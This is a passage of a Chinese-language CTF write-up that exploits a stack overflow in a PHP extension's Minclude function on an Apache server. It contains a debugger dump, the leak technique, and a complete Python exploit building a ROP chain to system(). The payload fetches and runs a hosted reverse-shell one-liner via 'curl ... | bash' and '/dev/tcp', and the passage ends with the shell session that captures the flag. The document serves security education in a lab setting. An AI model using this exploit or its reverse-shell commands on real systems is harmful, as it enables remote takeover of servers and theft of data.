   0x7ffff7fcc270 <zif_Minclude+80>     mov    edi, dword ptr [r8 + 0x2c]
   0x7ffff7fcc274 <zif_Minclude+84>     lea    rcx, [rsp + 8]
   0x7ffff7fcc279 <zif_Minclude+89>     mov    rdx, rsp
   0x7ffff7fcc27c <zif_Minclude+92>     lea    rsi, [rip + 0xd87]
 ► 0x7ffff7fcc283 <zif_Minclude+99>     call   zend_parse_parameters@plt <0x7ffff7fcc030>
        rdi: 0x1
        rsi: 0x7ffff7fcd00a ◂— 0x72003e72623c0073 /* 's' */
        rdx: 0x7fffffffaec0 ◂— 0x0
        rcx: 0x7fffffffaec8 —▸ 0x5555559d2f4c ◂— test   eax, eax

   0x7ffff7fcc288 <zif_Minclude+104>    cmp    eax, -1
   0x7ffff7fcc28b <zif_Minclude+107>    je     zif_Minclude+313 <0x7ffff7fcc359>

   0x7ffff7fcc291 <zif_Minclude+113>    mov    rdx, qword ptr [rsp + 8]
   0x7ffff7fcc296 <zif_Minclude+118>    mov    rsi, qword ptr [rsp]
   0x7ffff7fcc29a <zif_Minclude+122>    mov    rdi, rbx
   0x7ffff7fcc29d <zif_Minclude+125>    call   memcpy@plt <0x7ffff7fcc080>
───────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────
00:0000│ rdx rsp  0x7fffffffaec0 ◂— 0x0
01:0008│ rcx      0x7fffffffaec8 —▸ 0x5555559d2f4c ◂— test   eax, eax
02:0010│ rax rbx  0x7fffffffaed0 ◂— 0x0
... ↓
─────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────
 ► f 0     7ffff7fcc283 zif_Minclude+99
   f 1     555555a437ae execute_ex+19086
   f 2     555555a46d28 zend_execute+296
   f 3     5555559a4583 zend_execute_scripts+195
   f 4     555555941b78 php_execute_script+744
   f 5     555555a4925e
   f 6     5555556c72bc
   f 7     7ffff729b09b __libc_start_main+235
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>

可以算出来ret地址偏移是0x88

在栈偏移100处有一个栈地址,我们可以利用php_printf("%s", &dest);泄露它,然后构造ROP

libc地址该如何泄露呢?所有apache2工作进程都是从同一个父进程fork出来的,fork出的子进程与父进程的内存布局(PIE/ASLR基址)相同,所以在任意一个进程里包含/proc/self/maps就能得到所有进程的基址偏移,据此包含/proc/self/maps来泄露libc基地址

服务器上放的文件
aaa.txt

bash -i >& /dev/tcp/**.**.**.**/12345 0>&1

exp.py

from pwn import *
import requests
import urllib
import struct

url = "http://134.175.185.244/select.php"
# url = "http://49.51.251.99/select.php"
# url = "http://192.168.1.109/select.php"
# cookie ={
#     "PHPSESSID": "spnmkr49ajvc1n0bl32npv5njn"
# }

# Admin session: select.php only calls Minclude() when $_SESSION['admin']==1.
cookie ={
    "PHPSESSID": "p6jfsk2hrc7mii0k2pkajr22ms"
}

# res = requests.post(url,data=data,cookies=cookie)
# print(res.status_code)
payload = "a"*100  # unused below; the request rebuilds the same string inline
data = {
    'search':"a"*100,
    'submit':"submit"
}

# Step 1 - stack leak. zif_Minclude memcpy()s the argument into a 0x60-byte
# stack buffer with no length check and no terminator, so php_printf("%s")
# keeps printing past the buffer; the six bytes after the 'a's are a stack
# pointer (see the decompiled function in the writeup). Bounding the copy
# and NUL-terminating the buffer removes both the leak and the overflow.
res = requests.post(url,data=data,cookies=cookie)
# print(res.content)
res = res.content.split(b'a'*100)[1]
stack = res[0:6]+b'\x00\x00'  # 6 significant bytes of a user-space pointer, zero-extended to 8
stack = struct.unpack('<Q', stack)[0]
print("[+] stack:", hex(stack))

# Step 2 - libc base. The same function opens and prints any path, and the
# worker serving the next request is forked from the same parent, so one
# worker's /proc/self/maps is valid for all of them (the writeup's reasoning).
data = {
    'search': "/proc/self/maps", 
    'submit':"submit"
}
res = requests.post(url,data=data,cookies=cookie).content.split(b"\n")
# print res
for i in res:
    if b"libc-2.28.so" in i:
        print i;  # Python 2 print statement: this script is Python 2 (str and bytes are mixed below)
        libc_base = int(b"0x" + i[0:12], 16)  # start address of the first libc-2.28.so mapping line
        break
# NOTE: libc_base is unbound here if no libc-2.28.so line was found.
print("[+] libc_base:", hex(libc_base))


# Gadget and function offsets for the target's libc-2.28 build (page values).
pop_rdi_ret = 0x0000000000023a5f + libc_base
system_addr = 0x449c0 + libc_base

shell = b""
# payload = "a"*0x88+p64(pop_rdi_ret)+p64(stack+0x88+0x18)+p64(system_addr)+b"curl 192.168.1.112 | bash\x00"
# Step 3 - 0x88 bytes reach the saved return address (measured in gdb in the
# writeup; the extension has no stack canary), then pop rdi; ret with a
# pointer to the command string placed after the chain (the offset from the
# leaked stack pointer is empirical), then system(). The command fetches and
# runs the reverse-shell one-liner the writeup hosts as aaa.txt. On the
# defender's side, an Apache/PHP worker spawning sh, curl or bash is the
# detection signal for this class of exploit.
payload = "a"*0x88+p64(pop_rdi_ret)+p64(stack+0x88+0x18)+p64(system_addr)+b"curl radishes.top/aaa.txt | bash\x00"


data = {
    'search':payload, 
    'submit':"submit"
}

res = requests.post(url,data=data,cookies=cookie)

在服务器上用nc -lvvp 12345监听端口,拿到shell之后发现需要运行readflag来拿flag

参考https://www.zhaoj.in/read-5479.html,先执行trap "" 14(让 shell 忽略 SIGALRM,即 14 号信号)

然后再运行readflag来拿flag即可

www-data@22345a76257a:/$ cat flag
cat flag
cat: flag: Permission denied
www-data@22345a76257a:/$ ./readflag
./readflag
Solve the easy challenge first
(((((956115)-(763688))+(679286))-(112584))+(449894))
input your answer: bash: [6764: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@22345a76257a:/$ trap "" 14
trap "" 14
www-data@22345a76257a:/$ /readflag
/readflag
Solve the easy challenge first
(((((778617)-(484965))-(723852))+(-1007908))+(-494283))
input your answer: -1932391
ok! here is your flag!!
De1CTF{47ae3396-f5ce-47ab-bb64-34b5154064c4}
